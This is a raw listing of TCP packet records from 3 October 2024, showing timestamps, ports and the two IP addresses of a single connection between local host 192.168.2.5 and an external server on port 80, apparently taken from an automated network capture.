Oct 3, 2024 21:36:06.938666105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.938674927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.938688993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.938697100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.938709974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.938720942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.938740969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.939281940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.939296007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.939330101 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.973018885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.973054886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.973062992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.973423004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.973520041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.973537922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.973546028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.973555088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.973884106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.973972082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.973989964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.973999977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.974006891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.974082947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.974191904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.974206924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.974220991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.974234104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.974246979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.974256039 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.974277973 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.974780083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.974795103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.974808931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.974822044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.974836111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.974842072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.974855900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.974868059 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.974879026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.974889040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.974915028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.975704908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.975719929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.975740910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.975750923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.975759029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.975775957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.975781918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.975795031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.975811958 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.975820065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.975828886 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.975857019 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.976452112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.976464033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.976479053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.976497889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.976505041 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.976512909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.976526022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.976536036 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.976548910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.976558924 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.976571083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.976579905 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.976605892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.977380991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.977396011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.977408886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.977427959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.977438927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.977447987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.977456093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.977468967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.977479935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.977492094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.977500916 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.977514029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.977524042 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.977536917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.977546930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.977571964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:06.978192091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:06.978236914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.016896963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.016927958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.016954899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.017014027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.017034054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.017054081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.017069101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.017091990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.017116070 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.017226934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.017271042 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.017338037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.017359972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.017375946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.017393112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.017405033 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.017417908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.017417908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.017436981 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.017946959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.017961979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.017977953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.017992973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.018002033 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.018018961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.018058062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.018075943 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.018075943 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.018587112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.018600941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.018615007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.018631935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.018640041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.018650055 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.018665075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.018677950 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.018688917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.018703938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.018723011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.019520044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.019536018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.019551039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.019566059 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.019575119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.019583941 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.019598007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.019612074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.019622087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.019648075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.019659042 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.019670010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.019710064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.020442963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.020459890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.020474911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.020494938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.020502090 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.020509958 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.020522118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.020540953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.020550966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.020565033 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.020584106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.021115065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.021130085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.021143913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.021158934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.021168947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.021183014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.021193027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.021204948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.021215916 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.021226883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.021244049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.021275997 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.022048950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.022063971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.022078037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.022093058 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.022103071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.022111893 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.022124052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.022138119 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.022149086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.022166014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.022172928 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.022185087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.022206068 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.022998095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.023011923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.023025990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.023044109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.023051023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.023061037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.023073912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.023085117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.023096085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.023111105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.023130894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.023696899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.023777008 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.023808956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.023823977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.023838043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.023850918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.023879051 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.023888111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.023901939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.023916006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.023926973 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.023940086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.023952007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.023962975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.023974895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.023998022 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.025978088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.026026964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.026091099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.026124954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.026134014 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.026163101 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.026338100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.026354074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.026367903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.026381016 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.026392937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.026402950 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.026429892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.026760101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.026807070 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.059698105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.059715033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.059747934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.059849024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.059876919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.059890032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.059900999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.059916973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.059926987 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.059942007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.059950113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.059962988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.059984922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.060234070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.060277939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.060406923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.060520887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.060529947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.060544014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.060559988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.060580015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.060600996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.060818911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.060868025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.060900927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.060944080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.061059952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.061074972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.061099052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.061108112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.061115026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.061125994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.061142921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.061157942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.061501026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.061516047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.061530113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.061538935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.061553955 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.061561108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.061568975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.061582088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.061593056 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.061606884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.061615944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.061638117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.062203884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.062218904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.062235117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.062244892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.062259912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.062269926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.062279940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.062293053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.062305927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.062315941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.062328100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.062340975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.062350988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.062450886 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.062971115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.062985897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.062999010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.063007116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.063014984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.063023090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.063031912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.063039064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.063092947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.063859940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.063875914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.063889027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.063905954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.063913107 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.063927889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.063935041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.063954115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.063960075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.063980103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.063991070 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.103888035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.103903055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.103918076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.103929043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.103946924 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.103960037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.103986979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.104018927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.104207993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.104218006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.104228020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.104238033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.104253054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.104269028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.104284048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.104641914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.104687929 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.104727983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.104770899 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.104850054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.104859114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.104868889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.104895115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.104923010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.105273962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.105283022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.105292082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.105302095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.105314970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.105319977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.105335951 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.105369091 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.105885983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.105895042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.105902910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.105911970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.105921984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.105931997 CEST	49704	80	192.168.2.5	185.215.113.37
